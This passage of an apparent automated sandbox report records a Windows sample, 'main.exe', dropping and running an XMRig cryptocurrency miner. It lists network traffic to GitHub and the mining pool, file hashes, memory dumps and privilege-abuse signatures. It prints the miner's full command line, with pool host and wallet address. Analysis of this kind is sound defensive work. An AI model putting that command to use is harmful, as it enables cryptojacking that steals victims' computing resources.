NL 23.62.61.194:443 www.bing.com tcp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.111.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 194.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.111.199.185.in-addr.arpa udp
US 8.8.8.8:53 pool.hashvault.pro udp
DE 45.76.89.70:80 pool.hashvault.pro tcp
US 8.8.8.8:53 70.89.76.45.in-addr.arpa udp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 177.23.48.23.in-addr.arpa udp
US 8.8.8.8:53 203.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 210.143.182.52.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

MD5 e2fe87cc2c7dab8ca6516620dccd1381
SHA1 f714ec0448325435103519452610cf7aadf8bbba
SHA256 d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4
SHA512 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6

memory/4012-14-0x0000016BA2910000-0x0000016BA2930000-memory.dmp

memory/4012-15-0x0000016BA2970000-0x0000016BA2990000-memory.dmp

memory/4012-16-0x00007FF7C5F60000-0x00007FF7C6A63000-memory.dmp

memory/4012-18-0x0000016BA29B0000-0x0000016BA29D0000-memory.dmp

memory/4012-17-0x0000016BA2990000-0x0000016BA29B0000-memory.dmp

memory/4012-19-0x00007FF7C5F60000-0x00007FF7C6A63000-memory.dmp

memory/4012-20-0x00007FF7C5F60000-0x00007FF7C6A63000-memory.dmp

memory/4012-23-0x0000016BA29B0000-0x0000016BA29D0000-memory.dmp

memory/4012-22-0x0000016BA2990000-0x0000016BA29B0000-memory.dmp

memory/4012-21-0x00007FF7C5F60000-0x00007FF7C6A63000-memory.dmp

memory/4012-24-0x00007FF7C5F60000-0x00007FF7C6A63000-memory.dmp

memory/4012-25-0x00007FF7C5F60000-0x00007FF7C6A63000-memory.dmp

memory/4012-26-0x00007FF7C5F60000-0x00007FF7C6A63000-memory.dmp

memory/4012-27-0x00007FF7C5F60000-0x00007FF7C6A63000-memory.dmp

memory/4012-28-0x00007FF7C5F60000-0x00007FF7C6A63000-memory.dmp

memory/4012-29-0x00007FF7C5F60000-0x00007FF7C6A63000-memory.dmp

memory/4012-30-0x00007FF7C5F60000-0x00007FF7C6A63000-memory.dmp

memory/4012-31-0x00007FF7C5F60000-0x00007FF7C6A63000-memory.dmp

memory/4012-32-0x00007FF7C5F60000-0x00007FF7C6A63000-memory.dmp

memory/4012-33-0x00007FF7C5F60000-0x00007FF7C6A63000-memory.dmp

memory/4012-34-0x00007FF7C5F60000-0x00007FF7C6A63000-memory.dmp

memory/4012-35-0x00007FF7C5F60000-0x00007FF7C6A63000-memory.dmp

memory/4012-36-0x00007FF7C5F60000-0x00007FF7C6A63000-memory.dmp

memory/4012-37-0x00007FF7C5F60000-0x00007FF7C6A63000-memory.dmp

memory/4012-38-0x00007FF7C5F60000-0x00007FF7C6A63000-memory.dmp

memory/4012-39-0x00007FF7C5F60000-0x00007FF7C6A63000-memory.dmp

memory/4012-40-0x00007FF7C5F60000-0x00007FF7C6A63000-memory.dmp

memory/4012-41-0x00007FF7C5F60000-0x00007FF7C6A63000-memory.dmp

memory/4012-42-0x00007FF7C5F60000-0x00007FF7C6A63000-memory.dmp

memory/4012-43-0x00007FF7C5F60000-0x00007FF7C6A63000-memory.dmp

memory/4012-44-0x00007FF7C5F60000-0x00007FF7C6A63000-memory.dmp

memory/4012-45-0x00007FF7C5F60000-0x00007FF7C6A63000-memory.dmp

memory/4012-46-0x00007FF7C5F60000-0x00007FF7C6A63000-memory.dmp

memory/4012-47-0x00007FF7C5F60000-0x00007FF7C6A63000-memory.dmp

memory/4012-48-0x00007FF7C5F60000-0x00007FF7C6A63000-memory.dmp

memory/4012-49-0x00007FF7C5F60000-0x00007FF7C6A63000-memory.dmp

memory/4012-50-0x00007FF7C5F60000-0x00007FF7C6A63000-memory.dmp

memory/4012-51-0x00007FF7C5F60000-0x00007FF7C6A63000-memory.dmp

memory/4012-52-0x00007FF7C5F60000-0x00007FF7C6A63000-memory.dmp

memory/4012-53-0x00007FF7C5F60000-0x00007FF7C6A63000-memory.dmp

memory/4012-54-0x00007FF7C5F60000-0x00007FF7C6A63000-memory.dmp

memory/4012-55-0x00007FF7C5F60000-0x00007FF7C6A63000-memory.dmp

memory/4012-56-0x00007FF7C5F60000-0x00007FF7C6A63000-memory.dmp

memory/4012-57-0x00007FF7C5F60000-0x00007FF7C6A63000-memory.dmp

memory/4012-58-0x00007FF7C5F60000-0x00007FF7C6A63000-memory.dmp

memory/4012-59-0x00007FF7C5F60000-0x00007FF7C6A63000-memory.dmp

memory/4012-60-0x00007FF7C5F60000-0x00007FF7C6A63000-memory.dmp

memory/4012-61-0x00007FF7C5F60000-0x00007FF7C6A63000-memory.dmp

memory/4012-62-0x00007FF7C5F60000-0x00007FF7C6A63000-memory.dmp

memory/4012-63-0x00007FF7C5F60000-0x00007FF7C6A63000-memory.dmp

memory/4012-64-0x00007FF7C5F60000-0x00007FF7C6A63000-memory.dmp

memory/4012-65-0x00007FF7C5F60000-0x00007FF7C6A63000-memory.dmp

memory/4012-66-0x00007FF7C5F60000-0x00007FF7C6A63000-memory.dmp

memory/4012-67-0x00007FF7C5F60000-0x00007FF7C6A63000-memory.dmp

memory/4012-68-0x00007FF7C5F60000-0x00007FF7C6A63000-memory.dmp

memory/4012-69-0x00007FF7C5F60000-0x00007FF7C6A63000-memory.dmp

memory/4012-70-0x00007FF7C5F60000-0x00007FF7C6A63000-memory.dmp

memory/4012-71-0x00007FF7C5F60000-0x00007FF7C6A63000-memory.dmp

memory/4012-72-0x00007FF7C5F60000-0x00007FF7C6A63000-memory.dmp

memory/4012-73-0x00007FF7C5F60000-0x00007FF7C6A63000-memory.dmp

memory/4012-74-0x00007FF7C5F60000-0x00007FF7C6A63000-memory.dmp

memory/4012-75-0x00007FF7C5F60000-0x00007FF7C6A63000-memory.dmp

memory/4012-76-0x00007FF7C5F60000-0x00007FF7C6A63000-memory.dmp

memory/4012-77-0x00007FF7C5F60000-0x00007FF7C6A63000-memory.dmp

memory/4012-78-0x00007FF7C5F60000-0x00007FF7C6A63000-memory.dmp

memory/4012-79-0x00007FF7C5F60000-0x00007FF7C6A63000-memory.dmp

memory/4012-80-0x00007FF7C5F60000-0x00007FF7C6A63000-memory.dmp

memory/4012-81-0x00007FF7C5F60000-0x00007FF7C6A63000-memory.dmp

memory/4012-82-0x00007FF7C5F60000-0x00007FF7C6A63000-memory.dmp

Analysis: behavioral20

Detonation Overview

Submitted

2024-06-14 12:47

Reported

2024-06-14 13:49

Platform

win10v2004-20240611-en

Max time kernel

1792s

Max time network

1785s

Command Line

"C:\Users\Admin\AppData\Local\Temp\main.exe"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1052 wrote to memory of 2688 N/A C:\Users\Admin\AppData\Local\Temp\main.exe C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
PID 1052 wrote to memory of 2688 N/A C:\Users\Admin\AppData\Local\Temp\main.exe C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

Processes

C:\Users\Admin\AppData\Local\Temp\main.exe

"C:\Users\Admin\AppData\Local\Temp\main.exe"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14

Network

Country Destination Domain Proto
US 8.8.8.8:53 g.bing.com udp
US 13.107.21.237:443 g.bing.com tcp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 237.21.107.13.in-addr.arpa udp
US 8.8.8.8:53 99.58.20.217.in-addr.arpa udp
US 8.8.8.8:53 75.159.190.20.in-addr.arpa udp
NL 23.62.61.72:443 www.bing.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 72.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 26.35.223.20.in-addr.arpa udp
US 8.8.8.8:53 pool.hashvault.pro udp
DE 45.76.89.70:80 pool.hashvault.pro tcp
US 8.8.8.8:53 70.89.76.45.in-addr.arpa udp
US 8.8.8.8:53 183.59.114.20.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 0.205.248.87.in-addr.arpa udp
US 8.8.8.8:53 21.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 100.58.20.217.in-addr.arpa udp
US 8.8.8.8:53 200.64.52.20.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

MD5 e2fe87cc2c7dab8ca6516620dccd1381
SHA1 f714ec0448325435103519452610cf7aadf8bbba
SHA256 d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4
SHA512 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6

memory/2688-14-0x000001AA331D0000-0x000001AA331F0000-memory.dmp

memory/2688-15-0x000001AA33200000-0x000001AA33220000-memory.dmp

memory/2688-16-0x00007FF781030000-0x00007FF781B33000-memory.dmp

memory/2688-17-0x000001AA33240000-0x000001AA33260000-memory.dmp

memory/2688-18-0x000001AA33220000-0x000001AA33240000-memory.dmp

memory/2688-19-0x00007FF781030000-0x00007FF781B33000-memory.dmp

memory/2688-20-0x00007FF781030000-0x00007FF781B33000-memory.dmp

memory/2688-23-0x000001AA33220000-0x000001AA33240000-memory.dmp

memory/2688-22-0x000001AA33240000-0x000001AA33260000-memory.dmp

memory/2688-21-0x00007FF781030000-0x00007FF781B33000-memory.dmp

memory/2688-24-0x00007FF781030000-0x00007FF781B33000-memory.dmp

memory/2688-25-0x00007FF781030000-0x00007FF781B33000-memory.dmp

memory/2688-26-0x00007FF781030000-0x00007FF781B33000-memory.dmp

memory/2688-27-0x00007FF781030000-0x00007FF781B33000-memory.dmp

memory/2688-28-0x00007FF781030000-0x00007FF781B33000-memory.dmp

memory/2688-29-0x00007FF781030000-0x00007FF781B33000-memory.dmp

memory/2688-30-0x00007FF781030000-0x00007FF781B33000-memory.dmp

memory/2688-31-0x00007FF781030000-0x00007FF781B33000-memory.dmp

memory/2688-32-0x00007FF781030000-0x00007FF781B33000-memory.dmp

memory/2688-33-0x00007FF781030000-0x00007FF781B33000-memory.dmp

memory/2688-34-0x00007FF781030000-0x00007FF781B33000-memory.dmp

memory/2688-35-0x00007FF781030000-0x00007FF781B33000-memory.dmp

memory/2688-36-0x00007FF781030000-0x00007FF781B33000-memory.dmp

memory/2688-37-0x00007FF781030000-0x00007FF781B33000-memory.dmp

memory/2688-38-0x00007FF781030000-0x00007FF781B33000-memory.dmp

memory/2688-39-0x00007FF781030000-0x00007FF781B33000-memory.dmp

memory/2688-40-0x00007FF781030000-0x00007FF781B33000-memory.dmp

memory/2688-41-0x00007FF781030000-0x00007FF781B33000-memory.dmp

memory/2688-42-0x00007FF781030000-0x00007FF781B33000-memory.dmp

memory/2688-43-0x00007FF781030000-0x00007FF781B33000-memory.dmp

memory/2688-44-0x00007FF781030000-0x00007FF781B33000-memory.dmp

memory/2688-45-0x00007FF781030000-0x00007FF781B33000-memory.dmp

memory/2688-46-0x00007FF781030000-0x00007FF781B33000-memory.dmp

memory/2688-47-0x00007FF781030000-0x00007FF781B33000-memory.dmp

memory/2688-48-0x00007FF781030000-0x00007FF781B33000-memory.dmp

memory/2688-49-0x00007FF781030000-0x00007FF781B33000-memory.dmp

memory/2688-50-0x00007FF781030000-0x00007FF781B33000-memory.dmp

memory/2688-51-0x00007FF781030000-0x00007FF781B33000-memory.dmp

memory/2688-52-0x00007FF781030000-0x00007FF781B33000-memory.dmp

memory/2688-53-0x00007FF781030000-0x00007FF781B33000-memory.dmp

memory/2688-54-0x00007FF781030000-0x00007FF781B33000-memory.dmp

memory/2688-55-0x00007FF781030000-0x00007FF781B33000-memory.dmp

memory/2688-56-0x00007FF781030000-0x00007FF781B33000-memory.dmp

memory/2688-57-0x00007FF781030000-0x00007FF781B33000-memory.dmp

memory/2688-58-0x00007FF781030000-0x00007FF781B33000-memory.dmp

memory/2688-59-0x00007FF781030000-0x00007FF781B33000-memory.dmp

memory/2688-60-0x00007FF781030000-0x00007FF781B33000-memory.dmp

memory/2688-61-0x00007FF781030000-0x00007FF781B33000-memory.dmp

memory/2688-62-0x00007FF781030000-0x00007FF781B33000-memory.dmp

memory/2688-63-0x00007FF781030000-0x00007FF781B33000-memory.dmp

memory/2688-64-0x00007FF781030000-0x00007FF781B33000-memory.dmp

memory/2688-65-0x00007FF781030000-0x00007FF781B33000-memory.dmp

memory/2688-66-0x00007FF781030000-0x00007FF781B33000-memory.dmp

memory/2688-67-0x00007FF781030000-0x00007FF781B33000-memory.dmp

memory/2688-68-0x00007FF781030000-0x00007FF781B33000-memory.dmp

memory/2688-69-0x00007FF781030000-0x00007FF781B33000-memory.dmp

memory/2688-70-0x00007FF781030000-0x00007FF781B33000-memory.dmp

memory/2688-71-0x00007FF781030000-0x00007FF781B33000-memory.dmp

memory/2688-72-0x00007FF781030000-0x00007FF781B33000-memory.dmp

memory/2688-73-0x00007FF781030000-0x00007FF781B33000-memory.dmp

memory/2688-74-0x00007FF781030000-0x00007FF781B33000-memory.dmp

memory/2688-75-0x00007FF781030000-0x00007FF781B33000-memory.dmp

memory/2688-76-0x00007FF781030000-0x00007FF781B33000-memory.dmp

memory/2688-77-0x00007FF781030000-0x00007FF781B33000-memory.dmp

memory/2688-78-0x00007FF781030000-0x00007FF781B33000-memory.dmp

memory/2688-79-0x00007FF781030000-0x00007FF781B33000-memory.dmp

memory/2688-80-0x00007FF781030000-0x00007FF781B33000-memory.dmp

memory/2688-81-0x00007FF781030000-0x00007FF781B33000-memory.dmp

memory/2688-82-0x00007FF781030000-0x00007FF781B33000-memory.dmp